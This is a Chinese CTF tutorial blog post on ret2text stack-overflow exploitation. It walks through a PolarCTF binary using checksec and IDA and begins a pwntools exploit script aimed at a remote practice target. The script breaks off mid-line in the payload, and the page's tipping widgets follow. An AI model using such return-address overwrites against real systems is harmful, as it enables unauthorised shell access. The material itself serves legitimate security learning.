网络攻防快速入门笔记pwn | 02 栈溢出题型 | 2.1 ret2text和ret2shellcode

上一篇:网络攻防快速入门笔记pwn|01 Pwn栈溢出基础

下一篇:网络攻防快速入门笔记pwn | 02 栈溢出题型 | 2.2 ret2libc

欢迎关注~

一、ret2text

(一)题目中提供了system和/bin/sh

  1. 基本步骤:
  1. 检查二进制文件信息
  2. 打开IDA查看二进制的反汇编代码
  3. 编写exp脚本
  4. 开启靶机,进行远程连接
  5. 利用exp脚本打通远程,获取flag
  1. 原理

将返回地址覆盖为程序.text段中已有代码的地址,从而执行本身的代码,由于我们要获得shell,二进制文件中本身就含有一个可以直接获取权限的函数,然后我们通过栈溢出漏洞,控制程序执行留,将返回地址覆盖为这个函数的地址让文件运行这个获取权限的函数,我们就可以拿到权限,进而获取flag

  1. 例题
    例题:polarctf靶场——小狗汪汪汪
    【解答】
    拿到二进制文件,首先检查二进制文件:
    在这里插入图片描述
    No canary,说明可以进行栈溢出
    然后用IDA打开二进制文件进行分析
    在这里插入图片描述
    点进init函数中分析,这是一个初始化函数
    在这里插入图片描述
    点进dog函数中分析,有一个gets函数,有可能存在栈溢出:
    在这里插入图片描述
    Shift+F12,查看字符串,发现/bin/sh字符串,顺着字符串发现了getshell函数:
    在这里插入图片描述
    /bin/sh是可以获取系统的shell权限,也就是提权,这个函数是获取系统权限的关键点:
    在这里插入图片描述所以这里的思路就是把dog函数的返回地址设置成getshell函数的地址,当我们执行dog函数的时候,就会自动跳到执行getshell函数,从而来获取系统的shell。
    先找到getshell地址:
    在这里插入图片描述
    在这里插入图片描述

编写脚本:

from pwn import * #从pwn库中导入所有的函数
#io = process('./code/pwn/ret2text/woof') #本地连接二进制文件进行测试
#远程连接
io = remote('1.95.36.136',2060)
getshell_addr = 0x0804859b #getshell函数地址
padding = 4 + 9 #填入的数据长度
payload = b'a'*
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

李喵喵爱豆豆

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值